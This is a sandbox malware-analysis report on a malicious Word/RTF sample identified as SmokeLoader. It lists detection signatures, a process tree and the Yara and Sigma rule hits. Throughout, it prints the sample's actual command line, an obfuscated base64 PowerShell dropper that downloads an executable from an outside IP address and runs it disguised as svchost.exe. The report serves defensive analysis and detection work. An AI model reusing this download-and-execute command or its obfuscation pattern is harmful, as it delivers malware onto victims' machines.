Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
472.rtf.doc

Overview

General Information

Sample name: 472.rtf.doc
renamed because original name is a hash value
Original sample name: 472.rtf.doc
Analysis ID:1446716
MD5:0bd1328012301d04bdc921acb321b820
SHA1:724612a3c88f187aa000efe4ff4e9e04c9553696
SHA256:7be9ef61632edc0f2fc6ad59d64ad69dbffbd05013a80ab1dfbb6bd8a6090b66
Tags:docDofoilrtfSmokeLoader
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected SmokeLoader
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Encrypted powershell cmdline option found
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: System File Execution Location Anomaly
Suspicious command line found
Suspicious powershell command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1096 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 1408 cmdline: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • timeout.exe (PID: 1900 cmdline: timeout 3 MD5: 68A0A50CCAD87E1EE1944410A96D066C)
      • powershell.exe (PID: 1432 cmdline: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C; MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA= MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • svchost.exe (PID: 3188 cmdline: "C:\Users\user\AppData\Local\Temp\svchost.exe" MD5: 92C57DD80B764A028749520017D44E76)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.357457771.0000000000220000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.357823146.0000000002449000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x2edd:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: powershell.exe PID: 1432JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 1432INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x27bf4:$b2: ::FromBase64String(
    • 0x27d7d:$b2: ::FromBase64String(
    • 0x28109:$b2: ::FromBase64String(
    • 0x28462:$b2: ::FromBase64String(
    • 0x355de:$b2: ::FromBase64String(
    • 0x358a3:$b2: ::FromBase64String(
    • 0x35ef6:$b2: ::FromBase64String(
    • 0x3baf9:$b2: ::FromBase64String(
    • 0x3bc99:$b2: ::FromBase64String(
    • 0x3f21e:$b2: ::FromBase64String(
    • 0x3f3b2:$b2: ::FromBase64String(
    • 0x5005b:$b2: ::FromBase64String(
    • 0x65cab:$b2: ::FromBase64String(
    • 0x65dd3:$b2: ::FromBase64String(
    • 0x65fb5:$b2: ::FromBase64String(
    • 0xaff4b:$b2: ::FromBase64String(
    • 0xb00df:$b2: ::FromBase64String(
    • 0xb0b78:$b2: ::FromBase64String(
    • 0xeb172:$b2: ::FromBase64String(
    • 0xeb310:$b2: ::FromBase64String(
    • 0xeb5de:$b2: ::FromBase64String(
    Process Memory Space: powershell.exe PID: 3084JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.svchost.exe.220e67.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1096, ParentProcessName: WINWORD.EXE, ProcessCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1408, ProcessName: cmd.exe
        Sigma detected: Files With System Process Name In Unsuspected Locations
        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3084, TargetFilename: C:\Users\user\AppData\Local\Temp\svchost.exe
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1096, ParentProcessName: WINWORD.EXE, ProcessCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1408, ProcessName: cmd.exe
        Sigma detected: PowerShell Base64 Encoded Invoke Keyword
        Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1408, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1432, ProcessName: powershell.exe
        Sigma detected: Suspicious Encoded PowerShell Command Line
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, ProcessId: 3084, ProcessName: powershell.exe
        Sigma detected: Suspicious Microsoft Office Child Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 1096, ParentProcessName: WINWORD.EXE, ProcessCommandLine: cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ProcessId: 1408, ProcessName: cmd.exe
        Sigma detected: Suspicious PowerShell Encoded Command Patterns
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1432, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, ProcessId: 3084, ProcessName: powershell.exe
        Sigma detected: System File Execution Location Anomaly
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\svchost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3084, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\svchost.exe", ProcessId: 3188, ProcessName: svchost.exe
        Sigma detected: Suspicious Execution of Powershell with Base64
